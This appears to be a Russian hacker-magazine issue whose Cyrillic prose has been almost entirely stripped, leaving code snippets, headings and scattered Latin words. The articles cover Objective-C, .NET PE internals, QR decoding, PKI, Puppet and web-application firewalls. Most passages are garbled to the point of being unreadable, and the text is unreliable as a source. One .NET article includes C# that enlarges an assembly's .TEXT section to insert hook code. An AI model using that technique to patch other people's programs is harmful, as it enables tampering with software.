Objective-C
Cup * cup = [[Cup alloc] init];
@try
{
[cup fill];
}
@catch ( NSException * exc )
{
NSLog ( @"Exception caught: %@", exc );
}
@finally
{
[cup release];
}

100

,
. , , .

Objective-C
.
?
, .
Cocoa Carbon.
iOS Objective-C,
Cocoa.
Cocoa NeXTSTEP
OPENSTEP, NeXT.
Mac OS X, ,
. , #
Java, NSObject.
Cocoa , NSNumber
NSString, (NSArray, NSDictionary),
..
- Cocoa Objective-C
Cocoa-.
-.
, , XML.

,
. www.cbr.ru/scripts/XML_daily.asp XML :
<ValCurs Date="22.09.2010" name="Foreign Currency
Market">
<Valute ID="R01010">
<NumCode>036</NumCode>
<CharCode>AUD</CharCode>
<Nominal>1</Nominal>
<Value>29,4185</Value>
</Valute>
...
<Valute ID="R01020A">
<NumCode>944</NumCode>
<CharCode>AZN</CharCode>
<Nominal>1</Nominal>
<Value>38,6777</Value>
</Valute>
</ValCurs>

ObjC RCBDayly,
XML,
. .
, Cocoa XML.
, , POSIX,
GUI-, Cocoa .
- .

Apple
. ,
Mac OS X iOS ,
, Objective-C
. ! z

CODING
stannic.man@gmail.com

... .
, .
, 75000 ,
, JIT ...
-, 75 # ,
.

.NET

.NET-

, ,

. , ,
, 20%
GalaxyS.

, .NET . .
API- ,
. , , ,
. ,

102

WinAPI-. .NET . .NET Framework.


, , .
.NET-
, . .NET!

HTTP://WWW
links
http://reflector.red-gate.com
.NET
Reflector,
.NET,
.

DVD
dvd

,

.NET

Metadata Expert

,
Java .NET , Java-. .NET
Framework
.
,

. , .NET,
,
. ,
.NET,
, .
.NET
(Common Language Runtime CLR).
CLR
,
.
, CLR
.NET. , .NET
.NET Framework. , (Metadata) ,
, .NET.
, CLR
.
, .

Metadata

,
, .

, , ,
, .NET-. Metadata,
,
(heaps) . Microsoft .NET
: #US, #Strings, #Blob #GUID #~.
#US- ,
. ,
Print("hello"), hello
#US-.
#Strings- ,
.
#Blob- ,
, , , .
#~- ,
.NET-. , AssemblyRef, MethodRef, MethodDef,
Param. AssemblyRef
, .
MethodRef , . MethodDef
, .
Param, , , ,
MethodDef.
?, . !
, , , :).
MethodDef.
.NET-
.
RVA
(relative virtual address) , ,
, #Blob

INFO

info


Metadata
.NET-

.NET Metadata
Expert
,

Microsoft
.NET Framework.

103

CODING

TPL

LINQ

ADO.NET
Entity Framework

WPF
(Avalon)

WCS
(InfoCard)

WF
(Workflow)

.NET
Framework
2.0

Base Class Library

3.0

WCF
(Indigo)

3.5

PLINQ

Common Language Runtime (CLR)


.NET

Param, ,
. RVA
( IL-) .TEXT.
(calling
convention), ..
, rsdn.ru .NET, (http://www.rsdn.ru/article/dotnet/refl.xml, /phmetadata.xml, /dne.xml).

(BCL)
Main() .NET-. Main()
, Main() mscorwks.dll . Mscorwks.dll
JITFunction, JIT mscorjit.dll.
IL-
native-, Main(),
.

, -! .NET. ,
,
-, .
.NET -.
,
, , ,
.TEXT. , .TEXT
.NET
.
- , ( CALL
JUMP RVA-) ,
?
CALL JUMP MSIL- () , . ,
, , .
,
.TEXT .

. :

.NET-.
.NET- :
Mscoree.dll ( .NET)
Mscorwks.dll (where most of the stuff happens)
Mscorjit.dll ( JIT)
Mscorsn.dll ( )
Mscorlib.dll (Base Class Library )
Fusion.dll (assembly binding)
.NET- . _CorExeMain,
.
_CorExeMain, , mscoree.dll,
.NET-.
Mscoree.dll _CorExeMain mscorwks.dll.
Mscorwks.dll ,
. -

104

? !


MSDOS

PE

PE-,
.NET-

(.TEXT),
Metadata

(.DATA .RSRC)


(.RELOC .RDATA)

.NET

, . , , . -,
.
-,
.
RVA MethodDef
, . .TEXT ,
.
, raw- . , , raw , .
, ,
.
, , .TEXT
0x1000,
.TEXT, . , raw- 0x200,
, .TEXT
0x200.
, .TEXT ( ),
,
.TEXT ,
. PE-. ,
, .

, , , ,
.NET-,
CLIHeader,
, , , Metadata.
- :

CLIHEADER C#
FileReader Input = new FileReader(AssemblyPath);
byte[] Buffer = Input.Read();
[skip...]
ImageBase = Marshal.AllocHGlobal(Buffer.Length * 2);
HeaderOffset = *((UInt32 *)(ImageBase + 60));
PE = (PEHeader *)(ImageBase + HeaderOffset);
HeaderOffset += (UInt32)sizeof(PEHeader);
StandardHeader = (PEStandardHeader *)(ImageBase +
HeaderOffset);
RVA *CLIHeaderRVA = (RVA *)((byte *) StandardHeader
+ 208);
SectionOffset = GetSectionOffset(CLIHeaderRVA->
Address);
CLI = (CLIHeader *)(ImageBase + CLIHeaderRVA->Address
- SectionOffset);
MetaDataHeader = (MetaDataHeader *)(ImageBase +
CLI->MetaData.Address - SectionOffset);
metadata = new MetaData(Function, ImageBase,
(Int32)CLI->MetaData.Address, MetaDataHeader,
CLI->MetaData.Size);

, ,
PE-
.
.TEXT ,
, ,
PE-:
VirtualSize = TextSectionHeader->VirtualSize
+ HookSize;
RawDataSize = VirtualSize;
if ((RawDataSize % FileAlignment) != 0)
RawDataSize += (FileAlignment - (RawDataSize % FileAlignment));
StandardHeader->CodeSize = RawDataSize;
HookAddress = TextSectionHeader->VirtualAddress
+ TextSectionHeader->VirtualSize;
TextSectionHeader->VirtualSize = VirtualSize;
TextSectionHeader->RawDataSize = RawDataSize;
[skip...]
StandardHeader->DataBase = DataSectionHeader->
VirtualAddress;
StandardHeader->ImageSize = SectionHeader->
VirtualAddress + SectionHeader->VirtualSize;
if ((StandardHeader->ImageSize % SectionAlignment) != 0)
StandardHeader->ImageSize +=
(SectionAlignment - (StandardHeader->ImageSize % SectionAlignment));

. , 75 , , .
:). , ,
.

,
.NET , . , , RTFM .
,
, .
, .NET-
.z

105

CODING
c0n Difesa http://twitter.com/difezza, http://defec.ru



QR-


.
.
:
.
, .
-
. -
,
- .
(-, , ..)
.
,
.
, ,
( 30 ), .


-, ,
,
. ,

106

.
,
, , , ,

.

. . .

, . ,
:
1) (). ( ).
2) . :
2.1) (stacked);
2.2) (matrix).
,
. ,

INFO


Xakep Online: http://xakep.ru

PDF417.

, ,
, ,
.
QR-.
(
, , ,
)
, , . , QR
. quick response,
.

QR- . , ,
,
QR-.
QR-,
(
PrintScreen, ), , :
Xakep Online: http://xakep.ru
(
-,
..), .
QR-
, . , ,
,
, .

,

. ,
, ,
.
, QR- ,
, ,
, .


.NET C#.

, . ,
.NET Framework
.
, .NET Compact Framework, , .
:
Microsoft .NET Compact Framework
.NET Framework,


.
, QR- .
.NET Framework
.

- , (
, QR).
/
. SDK
: Windows,
*NIX, Windows Mobile, Symbian iPhone (Mac OS).
Windows,
Windows Mobile SDK (.dll), .NET/VC/VB.
QRCode DataMatrix
PDF417.
,
.

, ,
, QR-.
, ,

info
,
, QR-:
7089

( )
4296

2953
1817

HTTP://WWW
links
http://www.partitek.com/
-
SDK.
http://qrcoder.ru/

QR-.
http://www.xakep.ru/magazine/xa/084/056/2.asp


-.
http://defec.ru
,

.

DVD
dvd

107

CODING

-,

: , , ,
. PTIMAGE.
,
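unsafe public struct PTIMAGE
{
    public int dwWidth;          // image width
    public int dwHeight;         // image height
    public byte* pBits;          // pointer to the image data
    public byte* pPalette;       // pointer to the palette (1-, 4- and 8-bit images)
    public short wBitsPerPixel;  // bits per pixel
}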

SDK .
,
, .
,
, SDK.
.
PTDECODEPARA:
PTDECODEPARA
public unsafe struct PTDECODEPARA
{
public int dwStartX;// X
public int dwStartY;
public int dwEndX;
public int dwEndY;
public int dwMaxCount;//
; 0,

};

dwMaxCount, ,

108

QR- ,

.
, :
PTBARCODEINFO

public unsafe struct PTBARCODEINFO
{
/* */
public int dwX1, dwY1;
public int dwX2, dwY2;
public int dwX3, dwY3;
public int dwX4, dwY4;
public byte* pData; // ,

public int dwDataLen; // ( )

};

QR-,

, ,
QR-.
, , :
static void Main(string[] args)
{
PtQRDecodeRegister("12345678901234567890");//

PtInitImage(ref image); //

if (OpenFileDlg.FileName != "")
{
FileName = OpenFileDlg.FileName;
DecodeQR();
}

}


QR-

, DecodeQR(), QR- ,
, , ,
:

. - .
QR-
;
QR-
.
3D : QR-
.
, , .
,
/.

static private void DecodeQR()


{

/*
*/
if (PtLoadImage(FileName, ref image, 0) ==
PT_IMAGERW_SUCCESS)
{
if (PtQRDecode(ref image, ref DecodePara,
ref BarCodeInfo) != PT_QRDECODE_SUCCESS)
MessageBox.Show("An error occurred during recognition");
else
ShowBarCodeInfo(ref BarCodeInfo);//
-
}

}
// -,
QR-
static public unsafe void ShowBarCodeInfo(
ref PTTOTALBARCODEINFO BarCodeInfo)
{
if (BarCodeInfo.dwTotalCount <= 0)
{
MessageBox.Show("No barcode was found");
return;
}
string str = "";
//
{
str = str+Encoding.Default.GetString(byteArray);
//Encoding.GetEncoding("GB2312").GetString
str = str + "\n\n";
}
str = str + "\0";
MessageBox.Show(str);
}

.Decode()

QR-
.
( -
, -
, , .)
, , .

, ,
.

. , , , - (, ,
, QR-, ), QR- , .

, .
, . ,
QR- - . ,
, , . , .z

109

CODING
deeonis deeonis@gmail.com

,
. .
, ,
,
.
; , ,
BAD-DOMAIN.COM, , .
, ,
.
. , , ,
.

.

aka

, ,
.
, ,
, , .
.
m 0 n.
, , ,
m, ,
, m.
,
. :

int LinearSearch (int *array,
                  size_t arraySize, int key)
{
    for (size_t i = 0; i < arraySize; i++)
        if (array[i] == key)
            return (int)i; // index of the first match
    // key not found
    return -1;
}

, n ,
. , O(n). ,
.
. ,

110

,
. , . :

cookie.
- .
.
- .

. , ,
.

, -: ,
3000 , 3000 ,
3000*3000=9 000 000 . ,
,
, , .


. .
O(log n).
10 431 (log(3000)
* 3000 = 10431.4). 863 ,
. , !
20% - Opera Google Chrome
. -?
, , , .
, aaa < aab < baa
< bba < bbb < bbc < caa...
.
.
.
, , . ,
n ,
n/2.
,
, .
, .
:

.

int CCookieRemover::lowerbound(const CStringArray& a,
const int& n, const CString& t)
{
int result;
int l;
int half;
int first;
int middle;
l = n;
first = 0;
while(l>0)
{
half = l/2;
middle = first+half;
if( a[middle]<t )
{
first = middle+1;
l = l-half-1;
}
else
{
l = half;
}
}
result = first;
return result;
}

.
,
, .
,
.
, 10 000
. ,
, .

, .


() . , , , .
.
. , .

111

CODING


,
. ,
. ,
, . , , ,
. , X
X, .
{data, left, right}. data , left right
.
. data
,
.
. , K T
:

1. , , ,
;
2. , K X:
2.1. K = X,
;
2.2. K > X, K
;
2.3. K < X, K .


.
,
. , K T n, :

1. T , ;
2. , K X
n;
2.1. K > X, K
;
2.2. K < X, K ;
2.3. K = X, :
2.3.1. ,

112

;
2.3.2. ,
m , ,
, m;
2.3.3. , :
2.3.3.1. m,
Right(n);
2.3.3.2. Left(m) Left(n);
2.3.3.3. n Parent(n)
Right(n);
2.3.3.4. , n.

, , .
. , ,
,
. ,
, .
.

, .
, . , ,


. z

,
, .
, ,
.
.

C
. , , , ,
.


SYN/ACK
luchnik@it-university.ru



Windows Server 2008.
IT , .
, . -
,
. PKI
, ,
.

Windows Server 2008.

, ,
, ,
, , ,
, .
; , , .
, ,
: , ,
, ,
, .
.
X.509, . , ,
.
(Public Key Infrastructure (PKI))
,
, .
, PKI, :
, , ;
, , .
PKI,
.
(Certificate Policy) (Certificate
Practice Statements) .
,
,

114

, , .
,
(, HSM Hardware Security Module).
, , ( ).
.

,
, .
,
, . , ,
e-mail,
.
, .
,
,
-.
,
. ( ,
) .
.
, ,
,
.
,

.

,
,
, OCSP (Online Certificate Status Protocol).
,
OCSP responder
. ,
,
, (
, ,
, -- ).

PKI . ,
. , ,
HTTPS.
, ,
, . SSL-. ,
,
, , ,
.
, .

. ,
- ? , ,

. ? :
,
.
.
, 1
1, 1.
,
PKI,

,


. ,
,
, Konqueror Google Chrome.
,
, .
,
.
SSL-
- . , ,
.
- ( 1
2 ),
.
( ):
(Bridge CA Model).
() , .

-.
US governments Federal Bridge Certification Authority.
, n2
-. -
, .
, , ,
. , . ,
() ,
, . ,

.
, .

,
. Windows Server 2008
Active Directory
Certificate Services.
.

115

SYN/ACK


(Enterprise Standalone)
. , Enterprise CA
. Standalone
, , .
Standalone , Offline Root CA,
.
Root CA Subordinate CA. Root CA
, Subordinate CA .
, , .
: ,

WinXP SP2 Server 2003 SP2 SHA2 ,


Server 2003 SP2
KB938397,
Windows Update,
.

.
,
. Windows Server 2008 R2
,
, ,
,
.
, , ,
Offline, .
Standalone CA.

, ,
.
,
. ,
.
AIA CDP
,
. (Certificate
Revocation List (CRL)) CRL
Distribution Points (CDP) Authority Information Access (AIA) -

116

AD CS

AD CS
. ,
, (, HTTP,
LDAP FTP).

,
,
, , .
, . ,
,
, ,
,
, ,
.
, .
,
(data recovery agent).

.

(key
recovery agent),
.

.
1-2 , Subordinate Issuing CA 5 ,
NAP , .

, , ,
.
, .
,
PKI. 4096
, , , , , .
,
. ,
,
, ,

.
( )
( ).
.
, , ,
().
, .
, ,
.
.
,

, . .

. , -
, , ,
.
(, CBC-MAC
HMAC), ,
, ,
.
,
, ,
. ,
,
, .

AIA CDP
.
, ,
,
. ,
SHA1 ,
- , SHA2. , WinXP SP2
Server 2003 SP2 SHA2 ,
Server 2003 SP2 KB938397,
Windows Update, .

,
, Windows
Server 2008.
,
, . ,
,
.

. , ,
.
.
, .
, :
Issuing CA , Certpublishers
.
HSM-,
.
Enterprise Admin AD.
Stand-Alone Root CA,
Offline, CAPolicy.Inf,
AIA CDP
.

117

SYN/ACK
NATHAN BINKERT / NAT@SYNACK.RU /

. 2


http://technet.microsoft.com/en-us/library/cc780454(WS.10).aspx
A.K. Lenstra, E.R. Verheul Selecting cryptographic key sizes (http://www.win.tue.nl/~klenstra/key.pdf). http://www.keylength.com/en/ ,
, ,
.
PKCS (http://www.rsa.com/rsalabs/node.asp?id=2124) X.509 (http://www.itu.int/rec/T-REC-X.509/en)
, CApolicy.inf http://blogs.technet.com/b/askds/archive/2009/10/15/windows-server-2008-r2-capolicy-inf-syntax.aspx
PKI
whitepapers Windows PKI blog http://blogs.technet.com/b/pki/

. !

3.
CRL
CAPolicy.Inf
CRLPeriodUnits = 60
CRLPeriod = Days
CRLOverlapUnits = 1
CRLOverlapPeriod = Weeks
CRLDeltaPeriodUnits = 0
CRLDeltaPeriod = Hours

.
,
, , . CAPolicy.Inf %SystemRoot%,
.
:
CDP AIA ,
,
. Extensions
Certification Authority. CRL,

118


1. CAPolicy.Inf

[Version]
Signature= "$Windows NT$"
[Certsrv_Server]
RenewalKeyLength=2048
RenewalValidityPeriod=Years
RenewalValidityPeriodUnits=20
[CRLDistributionPoint]
[AuthorityInformationAccess]

2.
CRL certutil

certutil -setreg CA\CRLPeriodUnits 60
certutil -setreg CA\CRLPeriod "Days"
certutil -setreg CA\CRLOverlapUnits 1
certutil -setreg CA\CRLOverlapPeriod "Weeks"
certutil -setreg CA\CRLDeltaPeriodUnits 0
certutil -setreg CA\CRLDeltaPeriod "Hours"

,
.z

Bridge A

A
, Include in the CDP
(AIA) extension of issued certificates .
CDP AIA certutil.
.
CRL ,
online, CRL ,
CDP. CRL
Revoked Certificates Certification Authority certutil ( 2)
CAPolicy.Inf [certsrv_server] ( 3).
, .
, , .
.
Issuing Enterprise CA, Stand-Alone Root CA.
.
,
, Certification Authority Submit new request
Action .
,
Pending Requests. .
,
, , .

A
-

, PKI, ,
,

119

SYN/ACK
zobnin@gmail.com

Master
of puppets


Puppet

UNIX- Cfengine,
.
, Cfengine, ,
Puppet.
,
- ,
UNIX.
, ,
, .
, ,
- . :
?
SSH
. . -,
. -, (,
OpenOffice.org ,
).
, ,

. .
, ;

, ,
. , .

, Cfengine Puppet.

,
(,
, ,
,
..).

.
,
.

Puppet?

Cfengine,
Puppet, . Puppet
(Luke Kanies), Cfengine
. Cfengine,
Puppet .

120

Puppet ,
,
. Puppet
, , ,
(, ,
, , ,
). Puppet Ruby,

( ).
, Cfengine,
, Puppet , ,
.
Puppet . Cfengine,
UNIX- ( MacOS X),
Cygwin Windows. Ruby Factor,
(
, Cfengine ).

Cfengine, Puppet - ,
.
( Puppet
) . ( )
,
, , /
, ,
. ,
, ,
( , ). Puppet ,
. ,
Debian/Ubuntu Puppet :
$ sudo apt-get install puppet

:
$ sudo apt-get install puppet puppetmaster


/etc/puppet.
/etc/puppet/manifests/site.pp,
.

.
:
# vi /etc/puppet/manifests/site.pp
class passwd {
file { "/etc/passwd":
owner => root,
group => root,
mode => 644,
}
}
node default {
include passwd
}

, /etc/passwd root,
644.
.
/etc/puppet/puppet.conf.
,
,
Puppet. Ubuntu .
:

# vi /etc/puppet/puppet.conf
[main]
# Standard directories
logdir=/var/log/puppet
vardir=/var/lib/puppet
ssldir=/var/lib/puppet/ssl
rundir=/var/run/puppet
# Where Facter looks for additional facts
factpath=$vardir/lib/facter
# Synchronize plugins with the server
pluginsync=true
# Directory with templates
templatedir=$confdir/templates
# etckeeper hooks run before and after each Puppet run
prerun_command=/etc/puppet/etckeeper-commit-pre
postrun_command=/etc/puppet/etckeeper-commit-post

, , :
$ sudo sh -c 'puppetmasterd --genconfig > /etc/puppet/puppetd.conf.default'

$ sudo sh -c 'puppet --genconfig > /etc/puppet/puppetd.conf.default'

fileserver.conf auth.conf
(
) .
.
Puppet :
$ sudo /etc/init.d/puppetmaster restart

HTTP://WWW
links
http://docs.puppetlabs.com
Puppet
http://docs.puppetlabs.com/guides/language_tutorial.html
Puppet
http://docs.puppetlabs.com/references/stable/type.html


.


.
Puppet
,
(,
shmux):

121

SYN/ACK

,
Puppet

facter

$ sudo puppetd --server puppet-.com --verbose --test

,
:
$ sudo puppetca --list

:
$ sudo puppetca --sign nomad.grinder.com

PuppetLabs

:
$ sudo puppetca --sign --all

. Puppet- (
puppet):
$ sudo su
# echo '[puppet]' >> /etc/puppet/puppet.conf
# echo 'server=puppet-.com' >> /etc/puppet/puppet.conf
# exit

. /etc/passwd .
file ,
. owner => "root"
owner root, ,
(owner) .

, -, .
.
.
/etc/group, /etc/passwd ( - require):

:
$ sudo /etc/init.d/puppet start

, Puppet
,
,
, . , , ,
. bash, Puppet.
, ,
. ,
/etc/passwd:
# vi /etc/puppet/manifests/site.pp
file { "/etc/passwd":
owner => "root"
}

file . ,
, , ,

122

# vi /etc/puppet/manifests/site.pp
file { "/etc/group":
require => File["/etc/passwd"],
owner => "root",
}

, /etc/group ( ) ,
/etc/passwd.
, . ,
. ,
- nginx
:
# vi /etc/puppet/manifests/site.pp
class nginx {
package { "nginx":
ensure => installed
}
service { "nginx":
ensure => running,
require => Package["nginx"],
}
}

INFO

package
nginx , service . require
, . ,
:

info
Puppet
HTTP,



-.

# vi /etc/puppet/manifests/site.pp
service { "squid":
ensure => running,
require => Class["nginx"],
}

-,
:

Puppet
# vi /etc/puppet/manifests/site.pp
class passwd {
file { "/etc/passwd":
owner => "root",
group => "root",
}
}
class passwd-bsd inherits passwd {
File["/etc/passwd"] { group => "wheel" }
}

passwd-bsd passwd ,
group /etc/passwd (
BSD- /etc/passwd wheel, ).

.
, Puppet
. $
, (true, false):
$want_apache = true
$apache_version = "2.2.14"

Puppet,
, facter.
, ,
-, Puppet .
Puppet
.
, passwd
( ):
# vi /etc/puppet/manifests/site.pp
file { "/etc/passwd":
owner => "root",
group => $kernel ? {
Linux => "root",
FreeBSD => "wheel",
},
}

,
, group
root, wheel. ,
Puppet case,

:
# vi /etc/puppet/manifests/site.pp
case $operatingsystem {
redhat: { service { "httpd": ensure => running }}
debian: { service { "apache": ensure => running }}
default: { service { "apache2": ensure => running }}
}


service (
Linux , , Puppet,
).
default ,
.
file, package service, Puppet , . ,
, ,
http://docs.puppetlabs.com/references/stable/type.html.
:
Puppet
cron cron
exec
file
filebucket
group
host /etc/hosts
interface
mount
notify - Puppet
package

Puppet


.
Puppet,

(pxe-install) ,

,



.
Puppet
, Google,
Fedora Project,
Stanford University,
Red Hat, Siemens IT
Solution
SugarCRM.

WARNING
warning

Puppet
8140,

.

, Puppet


,
Cfengine, (
20 ).

123

SYN/ACK

service
sshkey SSH
tidy
user
zones Solaris

Puppet
(nodes). ,
. ,
, Puppet.
:
# vi /etc/puppet/manifests/site.pp
node default {
include passwd
}

default, /
passwd. default , /
passwd, - ,
. include
,
, . default (
),
(
). ,
, Puppet, (-
NTP-):
# vi /etc/puppet/manifests/site.pp
# SSH-
class sshd {
package { openssh-server: ensure => installed }
service { sshd:
name => $operatingsystem ? {
fedora => "sshd",
debian => "ssh",
default => "sshd",
},
enable => true,
ensure => running,
}
}
# Apache
class httpd {
package { httpd: ensure => installed }
service { httpd:
enable => true,
ensure => running,
}
}
# NTP-
class ntpd {
package { ntp-server: ensure => installed }
service {
ntp-server:
enable => true,
ensure => running,
}
}
# , -

node base {
include sshd
}
# , -
node web.server.com inherits base {
include httpd
}
# NTP-
node ntp.server.com inherits base {
include ntpd
}

: Apache web.server.com
NTP- ntp.server.com. SSH-.
;
, , Puppet.
Puppet.
,
( , Puppet ,
).


.
, - Apache, ,
, .
, Puppet
.
/etc/puppet/fileserver.
conf. Puppet , :
# vi /etc/puppet/fileserver.conf
[files]
path = /var/puppet/files
allow *.server.com

, /var/puppet/files
server.com. ,
IP-,
deny.

file. :
# vi /etc/puppet/manifests/site.pp
file { "/etc/httpd/conf/httpd.conf":
source => "puppet:///files/httpd/httpd.conf",
mode => 644,
}

httpd.conf, /var/puppet/
files/httpd, ,
.


Puppet. ,
. , Puppet
, ,
.!z

SYN/ACK
grinder grinder@tux.in.ua


-
,
, .
( )
. .
, , .
, .

GreenSQL-FW

-
- , .
(XSS, SQL-injection, XPath-injections, CSRF/XSRF,
HTTP Response Splitting, Include- )
,
.
, -
. , .
,
,
, . ,
AppArmor, SELinux TOMOYO Linux (][ 08.2010),

. .
GreenSQL-FW (greensql.net), ,
- - SQL-,
SQL- SQL-,
(DROP, CREATE ..).
GreenSQL,
DELETE, UPDATE INSERT,
, ID . ,
. ,
,
: , , TRUE,
, OR, .
, .
GreenSQL :
Simulation Mode (IDS), SQL-
;
Blocking Suspicious Commands ,
(IPS) ,
;
Active protection from unknown queries (db firewall);

126

Learning mode , .

Learning mode, GreenSQL
Active protection.
: Community, Light
Pro. ( GNU GPL)
, MySQL PostgreSQL
( 1.2) Linux. ,
, MS SQL Server
Win2k3/2k8.

, CMS , . GreenSQL , SQL-, .
GreenSQL 127.0.0.1:3305,
SQL- MySQL
127.0.0.1:3306.
.
-.
.
GreenSQL Community.
Ubuntu, RHEL/CentOS 5,
Fedora, Debian, SLE/openSUSE Mandriva. Ubuntu
: deb-, ,
:
$ sudo dpkg -i greensql-fw_1.2.2_amd64.deb

, GreenSQL, IP- , , root,


, .

. , ,
:
$ sudo dpkg-reconfigure greensql-fw

, greensql-create-db.
GreenSQL /etc/greensql. greensql.conf

,
.

,
, (/var/log/
greensql.log) .
,
.
, GreenSQL, : 3305 , 3306,
MySQL.

$ sudo nano /usr/share/greensql-fw/config.php


$db_type = "mysql";
$db_host = "localhost";
$dbport = 3306;
$db_name = "greendb";
$db_user = "green";
$db_pass = "pwd";

mod_alias -:
$ sudo a2enmod alias
$ sudo service apache2 restart

$ mysql -h 127.0.0.1 -P 3305 -u root -p

, , , show databases
.
, ,
3305, ,
GreenSQL 3306,
3305.
.
-. ,
/etc/greensql/greensql-apache.conf :
$ sudo nano /etc/apache2/apache2.conf
Include /etc/greensql/greensql-apache.conf

greensql-apache.conf :
$ sudo nano /etc/greensql/greensql-apache.conf
#
<IfModule mod_alias.c>
Alias /greensql "/usr/share/greensql-fw"
</IfModule>

templates_c:
$ sudo chmod 0777 /usr/share/greensql-fw/templates_c

config.php
:

-, admin pwd.


ModSecurity
- , ,
-. ,
. WASC (Web Application Security Consortium, webappsec.
org) ,
,
-, . , WASC
, . - ModSecurity
(modsecurity.org) WebDefend (breach.com) ,
, . , . (
2003 ) OpenSource-,
.
ModSecurity -
Apache 2.0/2.2,
.
, .

, ,
, .
ModSecurity

HTTP://WWW
links

GreenSQL-FW
greensql.net
WASC
webappsec.org
ModSecurity
modsecurity.org
OWASP
ModSecurity Core Rule Set owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
suPHP
suphp.org

htscanner pecl.php.net/package/htscanner

Suhosin hardened-php.net/suhosin

127

SYN/ACK

GreenSQL

- . ,
, ModSecurity.
ModSecurity
, . , OWASP Core Rule
Set (CRS, owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project),
- (0-day)
. CRS HTTP, ,
,
. Rules
Subscription Service. ClamAV.
( ) ,
Enhanced Rule Set (ERS),
(IIS, Outlook Web Access .),

PCI DSS (Payment Card Industry Data Security Standard),


.
ModSecurity 2.5.12,
,
, HTML-
(Content Injection),
( @verifyCC), XSS
PDF-. :
skipAfter, SecMarker, ctl:ruleRemoveById (
), GEO
, SecRuleScript, Lua. ,
rules-updater.pl,
.


Zorp

Syslog-NG,
(Balazs Scheidler), Zorp.
. Netfilter/iptables, Zorp , ,
. Zorp GPL (www.balabit.com)
GNU GPL.

GreenSQL

128


Suhosin

ModSecurity .
Ubuntu:
$ sudo apt-cache show libapache-mod-security | grep -i version
Version: 2.5.11-1

, , :
$ sudo apt-get install libapache-mod-security

,
, Debian, RHEL/CentOS, Fedora, Gentoo,
FreeBSD, Apache Windows . , ,
.

, . :
$ sudo apt-get build-dep libapache-mod-security

ModSecurity unique-id,
Ubuntu :
$ sudo a2enmod unique_id

Apache - --enable-unique-id --with-pcre. :


$ tar xzvf modsecurity-apache_2.5.12.tar.gz
$ cd modsecurity-apache_2.5.12/apache2
$ ./configure

apxs (APache eXtenSion tool),


:
$ make
$ make test
All tests passed (576).

Suhosin


ModSecurity Log Collector, make mlogc. :

INFO

$ sudo make install


:
$ sudo chmod 644 /usr/lib/apache2/modules/mod_security2.so

-, :

info

AppArmor, SELinux
TOMOYO Linux

][ 08.2010

$ sudo nano /etc/apache2/apache2.conf


LoadFile /usr/lib/libxml2.so
LoadFile /usr/lib/liblua5.1.so
LoadModule security2_module modules/mod_security2.so


ModSecurity.
,
, :
$ sudo cp modsecurity-apache_2.5.12/modsecurity.conf-minimal /etc/apache2/mod_security.conf


. ,
. ModSecurity
(modsecurity.org/documentation/modsecurityapache/2.5.12).
ModSecurity CRS,
OWASP ( 2.0.8, CVS). , , CRS base_rules


ModSecurity
optional_rules. /etc/apache2/modsecurity :
$ sudo mkdir /etc/apache2/modsecurity
$ tar xzvf modsecurity-crs_2.0.8.tar.gz
$ sudo mv -v modsecurity-crs_2.0.8/* /etc/apache2/modsecurity/

:
$ sudo nano /etc/apache2/apache2.conf
<IfModule security2_module>
Include modsecurity/*.conf
Include modsecurity/base_rules/*.conf
#
Include modsecurity/optional_rules/*.conf
</IfModule>

modsecurity_crs_10_config.conf,
ModSecurity, ;
,
, .
.
:
$ sudo service apache2 start

.
ModSecurity , ,
.

Suhosin PHP

, PHP
-,
. , , ,

. ,
: suPHP, htscanner Suhosin. suPHP
(suphp.org) Apache (mod_suphp)
PHP, PHP-
. htscanner (pecl.php.net/package/htscanner)
,
htaccess. , , Suhosin (hardened-php.net/suhosin),


GreenSQL

,
, include (
realpath SQL
).
Feature List (hardened-php.net/suhosin/a_feature_list.html).
Suhosin ,
.
PHP,
(Engine Protection).
Suhosin-, PHP.
PHP . Ubuntu
10.04:
$ sudo apt-get install php5-cli
$ php -v
PHP 5.3.2-1ubuntu4.5 with Suhosin-Patch (cli) (built: Sep 17 2010 13:49:46)

, PHP Suhosin. ,
PHP suhosin.so, PHP.
,
. ,
/. Ubuntu
.
$ sudo apt-get install php5-suhosin


/etc/php5/conf.d/suhosin.ini. , ,
, . man-
Configuration (hardened-php.net/suhosin/configuration.html).

-, , . ,
,
! z

UNITS

Oriyana oriyana@xpsycho.ru, Andrushock andrushock@real.xakep.ru

PSYCHO:

MEGAFAQ MINDFUCK

, , , , ][
, , , , ; .

, ,
, .
,
.
, 50
,
15-20 ,
, . . ,
, ,
; ,
! ,
. ,
,
, , .
.

Q:
?
:
.
,

, , ,




; ,
, , -

. , ,
,

,
(
),

. .

Q: ,
?
A: , , ,
, ,
.
,
, ,
.
: =
,
(
). , , ,

, .
, -

,
,
, . ,
: , ,
,
,
, . ?

( , , ,
, ,
),
; , ,
, .
,

.
, - (
),
- ,
,
.

Q:
?
A:
,
, ( ).
:
.
, , ,
- ,

MegaFAQ mindFUCK: ,
. .
: ?.
,

, ,

.
;
.
, ,
- ;
, ,

/,
;

,
..;
.

.
?,
,
.
, ,
. ,
, :
, , . ,
,

.
. .
, ,
,
, , ,


;

(

). e-mail,
,
,
, ,
. : 50%
,
;
,
,
5-10
.

Q: ,
?
A:
,

,
:

: , , , , ?

?
?
- ?
, ?
?
,
?
: , , ?

,
?

, ?

Q: .
?
A: ,
( ):
1. .

, .
,
. :
, .
, ,
. .
2. .

,
. ,
,
. , , ,


,
,
.
,
, .

Q: ? ?


A: , :
1. .

, ,
,

, ,
- . ,
, ,
.
2. .
,

, .
,
,

: ?. ;

.
3. .
(, )
.
, ,
,
. ,

,
.

, ,
-
.
4. .
, ?
,
.
,
,
:
,
, ,

.
5. !
, ,
, ,
-
. , ?
, , .
-


-
, .
,
, ,
() .

. ,
,
,
:
,
,
,
, ?
,
.
6. .
- : , , ,
. ,
, , ,
,
, .

Q: ,
?

A: , -
, ,
. ,
, ,
.
.
1. :
, ;
;
;
, .
:

;

(
),
, ;
:
, . ,
?.
2. :
(, ,
);

,
,
.
:
,
,
, ,
,
-
. ,

, ,
,
.
,
25- ,
- .

;
;
,
.
:
,
;
;
- ,
.
3. :
;

;
.
:
,
:
. , , .
4. :
;
, ;
-, , .
:
:
,
.

,
.

5. :
()
, .
:
( :
.
,
);
( ,

);


. ,
()
? ,
,
,
.
:
, , ,
,
, ,
,
.

Q:
,
() ,
5.1
. ?
A: ?
-
. .
,
,

,
.
, (16-100 ) ( ,
,
..), ,
,
. ,

.
.
